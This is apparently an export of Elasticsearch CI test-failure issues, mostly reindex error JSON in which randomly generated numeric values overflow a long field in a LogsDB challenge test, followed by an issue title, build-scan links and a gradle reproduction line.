(byte[])\"{\"@timestamp\":\"2024-01-01T10:01:36.000Z\",\"BIYicntUj\":26156,\"CbG\":0.45532227,\"CnlgHF\":0.91926426,\"FOYeRxqD\":[],\"GqPKDgPcW\":[{\"AiIldqn\":[{\"PvKeuk\":[null,0.82076216,null],\"pQZPIdLGV\":4235},{\"PvKeuk\":[0.1962946,0.63155776],\"pQZPIdLGV\":[-11516,19726,4731]}],\"HpTJPhI\":0.9841731,\"N\":0.5706844,\"TuMKO\":null,\"azG\":[25968,-15852,26143,-3941],\"bSi\":0.21214831,\"cgzCjnilT\":[\"RrYBLWuLYSpAWgkdOZjfzHUmRi\",\"cxzetKYeTmDoLaPtYfXrFjsVpfU\",\"vSYytLf\",\"NIxpiVnfSK\"],\"cuh\":{\"Cz\":77,\"EkjTaI\":[0.2451072929797632,0.67081039\"[truncated 110686 bytes]; line: 1, column: 8295]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (13718023628145033215) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:36.000Z\",\"BIYicntUj\":26156,\"CbG\":0.45532227,\"CnlgHF\":0.91926426,\"FOYeRxqD\":[],\"GqPKDgPcW\":[{\"AiIldqn\":[{\"PvKeuk\":[null,0.82076216,null],\"pQZPIdLGV\":4235},{\"PvKeuk\":[0.1962946,0.63155776],\"pQZPIdLGV\":[-11516,19726,4731]}],\"HpTJPhI\":0.9841731,\"N\":0.5706844,\"TuMKO\":null,\"azG\":[25968,-15852,26143,-3941],\"bSi\":0.21214831,\"cgzCjnilT\":[\"RrYBLWuLYSpAWgkdOZjfzHUmRi\",\"cxzetKYeTmDoLaPtYfXrFjsVpfU\",\"vSYytLf\",\"NIxpiVnfSK\"],\"cuh\":{\"Cz\":77,\"EkjTaI\":[0.2451072929797632,0.67081039\"[truncated 110686 bytes]; line: 1, column: 8295]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"18","cause":{"type":"document_parsing_exception","reason":"[1:422] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '18'. Preview of field's value: '17817506247876804607'","caused_by":{"type":"x_content_parse_exception","reason":"[1:442] Numeric value (17817506247876804607) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:18.000Z\",\"BIYicntUj\":-25274,\"CbG\":[0.22424316,0.26293945],\"CnlgHF\":[0.9764774,0.00960362,null,0.20529795],\"FOYeRxqD\":0.1,\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":-2004213218,\"BuiKGz\":[],\"DHcLlRsZgc\":[\"XOPpYpAmWqCdSHTgtTbAEanYlAEwHYBWtG\",\"\"],\"E\":[0.83480245,0.7832265,0.12696552,0.8538653,0.7376387],\"EPdEAaLSa\":[0.2341850727892918],\"GNHsDs\":-23323,\"Hbv\":2517146682352789495,\"HwKSDXz\":[],\"JTbUil\":[17817506247876804607,18279475704783437824],\"JdMdRqx\":0.9207744,\"JgACFgJk\":0.038\"[truncated 137208 bytes]; line: 1, column: 442]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (17817506247876804607) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:18.000Z\",\"BIYicntUj\":-25274,\"CbG\":[0.22424316,0.26293945],\"CnlgHF\":[0.9764774,0.00960362,null,0.20529795],\"FOYeRxqD\":0.1,\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":-2004213218,\"BuiKGz\":[],\"DHcLlRsZgc\":[\"XOPpYpAmWqCdSHTgtTbAEanYlAEwHYBWtG\",\"\"],\"E\":[0.83480245,0.7832265,0.12696552,0.8538653,0.7376387],\"EPdEAaLSa\":[0.2341850727892918],\"GNHsDs\":-23323,\"Hbv\":2517146682352789495,\"HwKSDXz\":[],\"JTbUil\":[17817506247876804607,18279475704783437824],\"JdMdRqx\":0.9207744,\"JgACFgJk\":0.038\"[truncated 137208 bytes]; line: 1, column: 442]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"0","cause":{"type":"document_parsing_exception","reason":"[1:552] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '0'. Preview of field's value: '16928885670477299711'","caused_by":{"type":"x_content_parse_exception","reason":"[1:572] Numeric value (16928885670477299711) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:00.000Z\",\"BIYicntUj\":[],\"CbG\":0.37036133,\"CnlgHF\":0.8701186,\"FOYeRxqD\":0.7,\"GqPKDgPcW\":{\"QkUddgG\":[{\"BbgI\":-391809563,\"BuiKGz\":[0.31210998987509797,0.4211707903310272,0.5238324966803567],\"DHcLlRsZgc\":[\"toUS\",\"woNCrmQBtU\",\"ByxxHVYyDTGtHlLxqHPyyr\",\"REStbYGsAEQBwUv\",\"noFNsRBLxqbpdvLOKetETQKYRoFaxeZ\"],\"E\":[0.45247185,null,0.5619554,0.2932222],\"EPdEAaLSa\":0.30081733261259325,\"GNHsDs\":-28595,\"Hbv\":[-6581317207849415199,-5940478341785705374,7075688384733881919],\"HwKSDXz\"\"[truncated 89579 bytes]; line: 1, column: 572]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (16928885670477299711) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:00.000Z\",\"BIYicntUj\":[],\"CbG\":0.37036133,\"CnlgHF\":0.8701186,\"FOYeRxqD\":0.7,\"GqPKDgPcW\":{\"QkUddgG\":[{\"BbgI\":-391809563,\"BuiKGz\":[0.31210998987509797,0.4211707903310272,0.5238324966803567],\"DHcLlRsZgc\":[\"toUS\",\"woNCrmQBtU\",\"ByxxHVYyDTGtHlLxqHPyyr\",\"REStbYGsAEQBwUv\",\"noFNsRBLxqbpdvLOKetETQKYRoFaxeZ\"],\"E\":[0.45247185,null,0.5619554,0.2932222],\"EPdEAaLSa\":0.30081733261259325,\"GNHsDs\":-28595,\"Hbv\":[-6581317207849415199,-5940478341785705374,7075688384733881919],\"HwKSDXz\"\"[truncated 89579 bytes]; line: 1, column: 572]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"93","cause":{"type":"document_parsing_exception","reason":"[1:488] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '93'. Preview of field's value: '18005179104483082240'","caused_by":{"type":"x_content_parse_exception","reason":"[1:508] Numeric value (18005179104483082240) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:33.000Z\",\"BIYicntUj\":13384,\"CbG\":[0.20690918,0.48486328,0.5415039,0.87939453],\"CnlgHF\":0.67139727,\"FOYeRxqD\":[0.9742321404007809,0.46589064935682634],\"GqPKDgPcW\":{\"QkUddgG\":[{\"BbgI\":-691081251,\"BuiKGz\":0.9331046453298772,\"DHcLlRsZgc\":null,\"E\":0.7725857,\"EPdEAaLSa\":0.7540876619575504,\"GNHsDs\":[-19536,-5601,24191,-25489,-12271],\"Hbv\":-8660197383234188997,\"HwKSDXz\":-3163859086532549537,\"JTbUil\":[8875407925565194240,167497574150832128,7319952392236040191,1800517910448\"[truncated 59944 bytes]; line: 1, column: 508]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (18005179104483082240) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:33.000Z\",\"BIYicntUj\":13384,\"CbG\":[0.20690918,0.48486328,0.5415039,0.87939453],\"CnlgHF\":0.67139727,\"FOYeRxqD\":[0.9742321404007809,0.46589064935682634],\"GqPKDgPcW\":{\"QkUddgG\":[{\"BbgI\":-691081251,\"BuiKGz\":0.9331046453298772,\"DHcLlRsZgc\":null,\"E\":0.7725857,\"EPdEAaLSa\":0.7540876619575504,\"GNHsDs\":[-19536,-5601,24191,-25489,-12271],\"Hbv\":-8660197383234188997,\"HwKSDXz\":-3163859086532549537,\"JTbUil\":[8875407925565194240,167497574150832128,7319952392236040191,1800517910448\"[truncated 59944 bytes]; line: 1, column: 508]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"77","cause":{"type":"document_parsing_exception","reason":"[1:509] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '77'. Preview of field's value: '9854310016901709823'","caused_by":{"type":"x_content_parse_exception","reason":"[1:528] Numeric value (9854310016901709823) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:17.000Z\",\"BIYicntUj\":[6384,null,-25817,28772],\"CbG\":[0.3671875,0.4645996,0.66259766],\"CnlgHF\":[],\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":[-615946558,1674966809,-1191842186,1655827260,1977611459],\"BuiKGz\":[0.46354473261845675,0.17495172748035148,0.9389251341744489],\"DHcLlRsZgc\":[\"dwp\"],\"E\":[0.24467093],\"EPdEAaLSa\":0.429685406860177,\"GNHsDs\":32267,\"Hbv\":[-7001495792756331069,7380507315989688059,5363990152555755749,null,-8498427877573261532],\"HwKSDXz\":6778028476386286742,\"J\"[truncated 219991 bytes]; line: 1, column: 528]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (9854310016901709823) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:17.000Z\",\"BIYicntUj\":[6384,null,-25817,28772],\"CbG\":[0.3671875,0.4645996,0.66259766],\"CnlgHF\":[],\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":[-615946558,1674966809,-1191842186,1655827260,1977611459],\"BuiKGz\":[0.46354473261845675,0.17495172748035148,0.9389251341744489],\"DHcLlRsZgc\":[\"dwp\"],\"E\":[0.24467093],\"EPdEAaLSa\":0.429685406860177,\"GNHsDs\":32267,\"Hbv\":[-7001495792756331069,7380507315989688059,5363990152555755749,null,-8498427877573261532],\"HwKSDXz\":6778028476386286742,\"J\"[truncated 219991 bytes]; line: 1, column: 528]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"69","cause":{"type":"document_parsing_exception","reason":"[1:534] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '69'. Preview of field's value: '9651755175924203520'","caused_by":{"type":"x_content_parse_exception","reason":"[1:553] Numeric value (9651755175924203520) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:09.000Z\",\"BIYicntUj\":[-15916,-20258],\"CbG\":[0.23291016,0.5854492,0.59277344,0.88671875],\"CnlgHF\":0.9257652,\"FOYeRxqD\":0.6,\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":-2054545878,\"BuiKGz\":0.9682399428418971,\"DHcLlRsZgc\":[\"oCkOtOXZjCgoAQulZEcBgGBgZoeGYB\"],\"E\":[0.6095246,0.2550859,0.027217865,0.54718894,0.7087077],\"EPdEAaLSa\":[0.6809474420470935,0.3585051852221556],\"GNHsDs\":[],\"Hbv\":[1617855589283274333,-3419127538922212141,null,7213721432607787087,1557972693147882722],\"HwKSDXz\"[truncated 134847 bytes]; line: 1, column: 553]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (9651755175924203520) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:09.000Z\",\"BIYicntUj\":[-15916,-20258],\"CbG\":[0.23291016,0.5854492,0.59277344,0.88671875],\"CnlgHF\":0.9257652,\"FOYeRxqD\":0.6,\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":-2054545878,\"BuiKGz\":0.9682399428418971,\"DHcLlRsZgc\":[\"oCkOtOXZjCgoAQulZEcBgGBgZoeGYB\"],\"E\":[0.6095246,0.2550859,0.027217865,0.54718894,0.7087077],\"EPdEAaLSa\":[0.6809474420470935,0.3585051852221556],\"GNHsDs\":[],\"Hbv\":[1617855589283274333,-3419127538922212141,null,7213721432607787087,1557972693147882722],\"HwKSDXz\"[truncated 134847 bytes]; line: 1, column: 553]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"16","cause":{"type":"document_parsing_exception","reason":"[1:4814] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '16'. Preview of field's value: '13195239650530164735'","caused_by":{"type":"x_content_parse_exception","reason":"[1:4834] Numeric value (13195239650530164735) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:16.000Z\",\"BIYicntUj\":[-282,-7965,-16660],\"CbG\":0.6767578,\"CnlgHF\":0.63265455,\"FOYeRxqD\":[0.1694897941911253,0.30023244207091115,0.6152106362878593],\"GqPKDgPcW\":[{\"AiIldqn\":[],\"HpTJPhI\":0.47283244,\"N\":0.8536368,\"TuMKO\":82,\"azG\":[16918,20614],\"bSi\":[null],\"cgzCjnilT\":[\"yjVqRvFepOGRvumOzQmyIL\",\"OcJsLFzwWXZYcKAGjXggYzhlKtmvefo\",\"ywUqDjJfLXdkIiid\"],\"cuh\":{\"Cz\":109,\"EkjTaI\":[0.725890475520366],\"K\":76,\"NgMkae\":0.7184540317567472,\"OFVhq\":[0.22420973],\"OWR\":[25072828502780\"[truncated 92306 bytes]; line: 1, column: 4834]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (13195239650530164735) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:16.000Z\",\"BIYicntUj\":[-282,-7965,-16660],\"CbG\":0.6767578,\"CnlgHF\":0.63265455,\"FOYeRxqD\":[0.1694897941911253,0.30023244207091115,0.6152106362878593],\"GqPKDgPcW\":[{\"AiIldqn\":[],\"HpTJPhI\":0.47283244,\"N\":0.8536368,\"TuMKO\":82,\"azG\":[16918,20614],\"bSi\":[null],\"cgzCjnilT\":[\"yjVqRvFepOGRvumOzQmyIL\",\"OcJsLFzwWXZYcKAGjXggYzhlKtmvefo\",\"ywUqDjJfLXdkIiid\"],\"cuh\":{\"Cz\":109,\"EkjTaI\":[0.725890475520366],\"K\":76,\"NgMkae\":0.7184540317567472,\"OFVhq\":[0.22420973],\"OWR\":[25072828502780\"[truncated 92306 bytes]; line: 1, column: 4834]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"62","cause":{"type":"document_parsing_exception","reason":"[1:10464] failed to parse field [GqPKDgPcW.QkUddgG.KBnpEj] of type [long] in document with id '62'. Preview of field's value: '14891760167765934079'","caused_by":{"type":"x_content_parse_exception","reason":"[1:10484] Numeric value (14891760167765934079) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:02.000Z\",\"CbG\":[0.11706543,0.30322266,0.31396484,0.3479004],\"CnlgHF\":0.31026947,\"FOYeRxqD\":[0.8885387254858883,0.1493939561897074,0.7935206756973161],\"GqPKDgPcW\":[{\"AiIldqn\":[],\"HpTJPhI\":[0.5980533,0.4065765,0.9946891,0.06711078],\"N\":0.5369475,\"TuMKO\":8,\"azG\":15616,\"bSi\":0.53228945,\"cgzCjnilT\":[\"XhXAgEwqsvJgqIgDvPimiglmaPBMMKpa\",\"SXKcnFvzUQiKjhFAEnXqHjhrbvxFXcN\"],\"cuh\":[{\"Cz\":[],\"EkjTaI\":0.2553675027405994,\"K\":-70,\"NgMkae\":[0.7468061391767997,0.7373025911510527,0.\"[truncated 172330 bytes]; line: 1, column: 10484]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (14891760167765934079) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:02.000Z\",\"CbG\":[0.11706543,0.30322266,0.31396484,0.3479004],\"CnlgHF\":0.31026947,\"FOYeRxqD\":[0.8885387254858883,0.1493939561897074,0.7935206756973161],\"GqPKDgPcW\":[{\"AiIldqn\":[],\"HpTJPhI\":[0.5980533,0.4065765,0.9946891,0.06711078],\"N\":0.5369475,\"TuMKO\":8,\"azG\":15616,\"bSi\":0.53228945,\"cgzCjnilT\":[\"XhXAgEwqsvJgqIgDvPimiglmaPBMMKpa\",\"SXKcnFvzUQiKjhFAEnXqHjhrbvxFXcN\"],\"cuh\":[{\"Cz\":[],\"EkjTaI\":0.2553675027405994,\"K\":-70,\"NgMkae\":[0.7468061391767997,0.7373025911510527,0.\"[truncated 172330 bytes]; line: 1, column: 10484]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"27","cause":{"type":"document_parsing_exception","reason":"[1:661] failed to parse field [GqPKDgPcW.QkUddgG.S] of type [long] in document with id '27'. Preview of field's value: '12683253654489137151'","caused_by":{"type":"x_content_parse_exception","reason":"[1:681] Numeric value (12683253654489137151) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:27.000Z\",\"BIYicntUj\":22473,\"CbG\":0.21325684,\"CnlgHF\":0.62453157,\"FOYeRxqD\":[0.46527109515670007,0.9355437064617661,0.8049283221304852,0.18683685226776914,0.178615826465796],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[-1995477548,-1498789429,-295950450,-1302391141,1058685015],\"BuiKGz\":null,\"DHcLlRsZgc\":\"hEUjxdd\",\"E\":[0.7353907],\"EPdEAaLSa\":0.19578547297837412,\"GNHsDs\":[24417,5916,-28489],\"Hbv\":-8692013472845669686,\"HwKSDXz\":[-1340153406629283664,7612717843738506735],\"JTbUil\":\"[truncated 96265 bytes]; line: 1, column: 681]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (12683253654489137151) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:27.000Z\",\"BIYicntUj\":22473,\"CbG\":0.21325684,\"CnlgHF\":0.62453157,\"FOYeRxqD\":[0.46527109515670007,0.9355437064617661,0.8049283221304852,0.18683685226776914,0.178615826465796],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[-1995477548,-1498789429,-295950450,-1302391141,1058685015],\"BuiKGz\":null,\"DHcLlRsZgc\":\"hEUjxdd\",\"E\":[0.7353907],\"EPdEAaLSa\":0.19578547297837412,\"GNHsDs\":[24417,5916,-28489],\"Hbv\":-8692013472845669686,\"HwKSDXz\":[-1340153406629283664,7612717843738506735],\"JTbUil\":\"[truncated 96265 bytes]; line: 1, column: 681]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"14","cause":{"type":"document_parsing_exception","reason":"[1:448] failed to parse field [GqPKDgPcW.QkUddgG.KBnpEj] of type [long] in document with id '14'. Preview of field's value: '16766348573099950080'","caused_by":{"type":"x_content_parse_exception","reason":"[1:468] Numeric value (16766348573099950080) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:14.000Z\",\"CbG\":0.6303711,\"CnlgHF\":0.5097175,\"FOYeRxqD\":[0.7454237020349306,0.9242064918844785,null],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[387305067],\"BuiKGz\":0.5333653356364566,\"DHcLlRsZgc\":null,\"E\":0.71107334,\"EPdEAaLSa\":null,\"GNHsDs\":[-30276,-4482,-29507,-8273,24889],\"Hbv\":[7498867121155332210],\"HwKSDXz\":-4062297464446115161,\"JTbUil\":2813085853826416639,\"JdMdRqx\":0.5688622,\"JgACFgJk\":[0.9819797,0.9344796],\"KBnpEj\":16766348573099950080,\"LVieIM\":[0.9321580216599489,0.3\"[truncated 107651 bytes]; line: 1, column: 468]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (16766348573099950080) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:14.000Z\",\"CbG\":0.6303711,\"CnlgHF\":0.5097175,\"FOYeRxqD\":[0.7454237020349306,0.9242064918844785,null],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[387305067],\"BuiKGz\":0.5333653356364566,\"DHcLlRsZgc\":null,\"E\":0.71107334,\"EPdEAaLSa\":null,\"GNHsDs\":[-30276,-4482,-29507,-8273,24889],\"Hbv\":[7498867121155332210],\"HwKSDXz\":-4062297464446115161,\"JTbUil\":2813085853826416639,\"JdMdRqx\":0.5688622,\"JgACFgJk\":[0.9819797,0.9344796],\"KBnpEj\":16766348573099950080,\"LVieIM\":[0.9321580216599489,0.3\"[truncated 107651 bytes]; line: 1, column: 468]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"28","cause":{"type":"document_parsing_exception","reason":"[1:766] failed to parse field [GqPKDgPcW.QkUddgG.KBnpEj] of type [long] in document with id '28'. Preview of field's value: '17699813458087772159'","caused_by":{"type":"x_content_parse_exception","reason":"[1:786] Numeric value (17699813458087772159) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:28.000Z\",\"BIYicntUj\":[14484,2259,-22198,-21500],\"CbG\":[0.22570801,0.2310791,0.3659668,0.9038086],\"CnlgHF\":[],\"FOYeRxqD\":[0.6495207294695711,0.21579926105990577,0.7604767984475819],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":null,\"BuiKGz\":[0.22108071317149824,0.13868494881631332,0.9424638464089149,0.07967363355769286],\"DHcLlRsZgc\":[\"NWopGADYdMZwcdzCMWzhvvYn\",\"gRbssVUdnNadzcIEVSZTMWNhXPPnMglj\",\"FgePpGkAoYIhWFHpRdWhSIBJCxYvjgMrhOyYu\",\"KJaDLFelbeeWvbNszkFLFmDXczpmSUKzPKzTSMuFnPPL\"[truncated 216600 bytes]; line: 1, column: 786]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (17699813458087772159) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:28.000Z\",\"BIYicntUj\":[14484,2259,-22198,-21500],\"CbG\":[0.22570801,0.2310791,0.3659668,0.9038086],\"CnlgHF\":[],\"FOYeRxqD\":[0.6495207294695711,0.21579926105990577,0.7604767984475819],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":null,\"BuiKGz\":[0.22108071317149824,0.13868494881631332,0.9424638464089149,0.07967363355769286],\"DHcLlRsZgc\":[\"NWopGADYdMZwcdzCMWzhvvYn\",\"gRbssVUdnNadzcIEVSZTMWNhXPPnMglj\",\"FgePpGkAoYIhWFHpRdWhSIBJCxYvjgMrhOyYu\",\"KJaDLFelbeeWvbNszkFLFmDXczpmSUKzPKzTSMuFnPPL\"[truncated 216600 bytes]; line: 1, column: 786]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"15","cause":{"type":"document_parsing_exception","reason":"[1:3763] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '15'. Preview of field's value: '16369088137151905791'","caused_by":{"type":"x_content_parse_exception","reason":"[1:3783] Numeric value (16369088137151905791) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:15.000Z\",\"BIYicntUj\":-29165,\"CbG\":[3.8695335E-4,0.092285156,0.13464355,0.84228516],\"CnlgHF\":0.6032725,\"FOYeRxqD\":0.4,\"GqPKDgPcW\":[{\"AiIldqn\":{\"PvKeuk\":0.6618162,\"pQZPIdLGV\":[]},\"HpTJPhI\":[0.2556126,0.68787,0.7909758,0.9442189],\"N\":[0.14636719,0.26625705],\"TuMKO\":[-51,-22,93,-100,79],\"azG\":-28446,\"bSi\":0.7432423,\"cgzCjnilT\":[\"aDKD\",\"YmeqSQRqiwhvhCuhqITUhRUxcwhamcRvBDufbeYh\",\"OMCAHkMqWdshwOVeAfsnKlW\"],\"cuh\":{\"Cz\":[23,81],\"EkjTaI\":[0.1963099041501205,0.22531349682083\"[truncated 187662 bytes]; line: 1, column: 3783]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (16369088137151905791) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:15.000Z\",\"BIYicntUj\":-29165,\"CbG\":[3.8695335E-4,0.092285156,0.13464355,0.84228516],\"CnlgHF\":0.6032725,\"FOYeRxqD\":0.4,\"GqPKDgPcW\":[{\"AiIldqn\":{\"PvKeuk\":0.6618162,\"pQZPIdLGV\":[]},\"HpTJPhI\":[0.2556126,0.68787,0.7909758,0.9442189],\"N\":[0.14636719,0.26625705],\"TuMKO\":[-51,-22,93,-100,79],\"azG\":-28446,\"bSi\":0.7432423,\"cgzCjnilT\":[\"aDKD\",\"YmeqSQRqiwhvhCuhqITUhRUxcwhamcRvBDufbeYh\",\"OMCAHkMqWdshwOVeAfsnKlW\"],\"cuh\":{\"Cz\":[23,81],\"EkjTaI\":[0.1963099041501205,0.22531349682083\"[truncated 187662 bytes]; line: 1, column: 3783]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"44","cause":{"type":"document_parsing_exception","reason":"[1:772] failed to parse field [GqPKDgPcW.dKIUwMACBc.Yh] of type [long] in document with id '44'. Preview of field's value: '11174023256438996991'","caused_by":{"type":"x_content_parse_exception","reason":"[1:792] Numeric value (11174023256438996991) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:44.000Z\",\"BIYicntUj\":-13212,\"CbG\":0.48413086,\"CnlgHF\":0.71537393,\"FOYeRxqD\":[0.059124659576416994,0.5306939000187222,0.16621908107672034,0.47557521838267636,0.3124607249639817],\"GqPKDgPcW\":{\"QkUddgG\":[],\"QmLSh\":[-63816273,1188815838,-31011288,1945936971],\"SYcewcPE\":-1138553278,\"VoV\":[\"zfOZCvbzuxefyegoLjHArnQqGGbrtCWcYgad\",\"XofvzuekHHBVZsfgwfegugoTOkwNQdigqqfdU\",\"DYgYuiIHIKSpFYZOnwJXBgWK\",\"UpMnwEWCsmFxwmKcyuAkRtrBePfpnNSrHwvunTPYRgifzEjLT\"],\"Y\":-19119,\"bKYHZQ\":[\"to\"[truncated 63717 bytes]; line: 1, column: 792]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (11174023256438996991) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:44.000Z\",\"BIYicntUj\":-13212,\"CbG\":0.48413086,\"CnlgHF\":0.71537393,\"FOYeRxqD\":[0.059124659576416994,0.5306939000187222,0.16621908107672034,0.47557521838267636,0.3124607249639817],\"GqPKDgPcW\":{\"QkUddgG\":[],\"QmLSh\":[-63816273,1188815838,-31011288,1945936971],\"SYcewcPE\":-1138553278,\"VoV\":[\"zfOZCvbzuxefyegoLjHArnQqGGbrtCWcYgad\",\"XofvzuekHHBVZsfgwfegugoTOkwNQdigqqfdU\",\"DYgYuiIHIKSpFYZOnwJXBgWK\",\"UpMnwEWCsmFxwmKcyuAkRtrBePfpnNSrHwvunTPYRgifzEjLT\"],\"Y\":-19119,\"bKYHZQ\":[\"to\"[truncated 63717 bytes]; line: 1, column: 792]","status":400,"failure_store":"not_enabled"}]}  **Issue Reasons:** - [main] 2 failures in test testMatchAllQuery (0.4% fail rate in 501 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119510</t>
  </si>
  <si>
    <t>[CI] LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT testEsqlSource failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #5668 / amazonlinux-2023_platform-support-aws](https://gradle-enterprise.elastic.co/s/2zzn7upuwuywq) - [elasticsearch-pull-request #48589 / part-2](https://gradle-enterprise.elastic.co/s/a2mi6czjx7e5c) - [elasticsearch-pull-request #48295 / part-2](https://gradle-enterprise.elastic.co/s/luebmsugrryku) **Reproduction Line:**  ./gradlew ":x-pack:plugin:logsdb:javaRestTest" --tests "org.elasticsearch.xpack.logsdb.qa.LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT.testEsqlSource" -Dtests.seed=78EA3B3F8E840933 -Dtests.locale=ff-Adlm-NG -Dtests.timezone=US/Central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xpack.logsdb.qa.LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(testEsqlSource),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.ResponseException: method [POST], host [http://[::1]:33657], URI [/_reindex?refresh=true], status line [HTTP/1.1 400 Bad Request] 